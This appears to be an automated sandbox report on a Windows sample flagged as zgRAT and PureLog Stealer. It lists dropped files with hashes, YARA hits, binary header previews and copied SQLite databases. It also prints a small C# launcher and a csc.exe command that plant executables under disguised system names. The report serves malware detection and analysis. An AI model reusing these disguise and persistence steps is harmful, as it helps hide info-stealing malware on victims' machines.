                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (649), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):649
                                                                    Entropy (8bit):5.874951939748383
                                                                    Encrypted:false
                                                                    SSDEEP:12:RVB5qjCKJ4a2Uc8GoTLIsndSA+qm93UWVNx6+j3wZS7QoJTBhypdLnX7MQ:TqjUa2Uc8GoT0snAAtmWI6zSU+TT4jt
                                                                    MD5:38E28EA64062356A490CE0ACAE86C2C8
                                                                    SHA1:6FCED6B5CFA3E04C80CBB954BC5593FEF170D76E
                                                                    SHA-256:8BA43CD6C3573F18DA5117546930B56A7A02D8C916FB4EE08E7719133CA240A1
                                                                    SHA-512:3D536EB9D458CAEEB9CEF8BBE5F6A3ADD239CBAB3ACD5E69412C2B34E5A1158BC5D75245FF0B02C38BCCDF0AB10B6ACEBDA1F910D6C95033DB5A736958A339BA
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                    Process:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                    Process:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1396
                                                                    Entropy (8bit):5.350961817021757
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                    Category:dropped
                                                                    Size (bytes):388
                                                                    Entropy (8bit):4.932211032448267
                                                                    Encrypted:false
                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLL3iFkD:JNVQIbSfhV7TiFkMSfhnSFkD
                                                                    MD5:BAD0FD8633120B77C3C9542AC42F7EEE
                                                                    SHA1:7F3764778D18B19031BD0FE2EC54C80D3F14128F
                                                                    SHA-256:837968BD122F35199CBC9D85FAA7C0211A55A6063539A0C7CF4C2E9FFB996394
                                                                    SHA-512:F5E93C8F820D6630F043B3D104D5081A61894F05BA010BFB02F66BCF2B0897E33EE362F533E02F93FB08FB9361205BE9A996DF926B633CFB5AED9F56D05C18D9
                                                                    Malicious:false
                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\AppReadiness\RuntimeBroker.exe"); } catch { } }).Start();. }.}.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):254
                                                                    Entropy (8bit):5.13143441127512
                                                                    Encrypted:false
                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fB:Hu7L//TRq79cQlZZ
                                                                    MD5:A72970F61574E956120829C03E04ECF5
                                                                    SHA1:DDB04DD39AB34459E9A149332C06A9404FEE86F8
                                                                    SHA-256:F941B201CE03E10C3CEA64479079C00935C0016BA5519157CEAB230A7CA860FE
                                                                    SHA-512:A88D802A6D0318E7BDD83799DEEA120DF4D22316DD4D6799867BFBBA5E2AA330D228C8641DD747E59B34EE7EDF4952F0A6293A9DEB656CAA5BBC6931BF941E25
                                                                    Malicious:false
                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.0.cs"
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):758
                                                                    Entropy (8bit):5.266909171960612
                                                                    Encrypted:false
                                                                    SSDEEP:12:Ka/I/u7L//TRq79cQlZcKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwI/un/Vq79tDcKax5DqBVKVrdFAMBJj
                                                                    MD5:58C8BE0A262ED057121AD6A899155F8E
                                                                    SHA1:12ED449430EC7D74B4BF47A4FB07213BE29E8A6C
                                                                    SHA-256:38F2C2C50D55AB1C61252A229EE4CAA07ED4044B471B29A10BE495AD0AE259E7
                                                                    SHA-512:CB6472000E9AC18C17F94318BE564CE7D316D51D8F4610BEB7BEDFC95CA7EBB506B08C52EDF5FFBEB5BBF7148C2EE72C9056DBF625E0DD07FE5792FC3655F476
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.163856189774724
                                                                    Encrypted:false
                                                                    SSDEEP:3:bcc1iBmZVLV+n:Pi4h+n
                                                                    MD5:F72C0D28D86B7ED486ACAD860D8F5B64
                                                                    SHA1:AAE5E1B1616A598B027946E05748987610762C2D
                                                                    SHA-256:5734F60690D7EB3E7D618A49F2DBE3124EC9E061EF76D47B50A3B69ED484C778
                                                                    SHA-512:C862A2451C79FC8185C84E27F2796418F91DC5DC16E5D4F83661502DAB72C961F69C689529D083C53D954501481FFDC3AEB37FD104FD251976E75234F6C3E859
                                                                    Malicious:false
                                                                    Preview:1gyfJJW6BPGmYYUUpVs7npsAg
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
